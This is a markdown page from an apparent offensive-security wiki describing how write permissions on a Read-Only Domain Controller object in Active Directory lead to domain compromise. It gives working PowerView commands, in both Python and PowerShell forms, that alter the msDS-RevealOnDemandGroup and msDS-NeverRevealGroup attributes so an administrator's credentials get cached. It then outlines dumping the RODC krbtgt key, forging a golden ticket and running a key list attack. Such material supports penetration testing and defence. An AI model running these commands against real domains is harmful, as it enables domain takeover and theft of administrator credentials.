Skip to content

Latest commit

 

History

History
51 lines (39 loc) · 3.56 KB

rights-on-rodc-object.md

File metadata and controls

51 lines (39 loc) · 3.56 KB
Raw

Rights on RODC object

With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.

{% hint style="info" %} For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty against the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:

  • GenericWrite
  • GenericAll / FullControl
  • WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)
  • Owns (c.f. WriteDacl)
  • WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)
  • WriteProperty against the msDS-RevealOnDemandGroupattribute in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may be required if it includes the target account. {% endhint %}

{% tabs %} {% tab title="UNIX-like" %} From UNIX-like systems, this PowerView python package (Python) can be used to modify the LDAP attribute.

powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"

#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
#Then, append the Allowed RODC Password Replication Group group
PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'

#If needed, remove the admin from the msDS-NeverRevealGroup attribute
PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup

Then, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash. {% endtab %}

{% tab title="Windows" %} From Windows systems, PowerView (PowerShell) can be used for this purpose.

#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}

#If needed, remove the admin from the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'

Then, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash. {% endtab %} {% endtabs %}

References

{% embed url="https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06" %}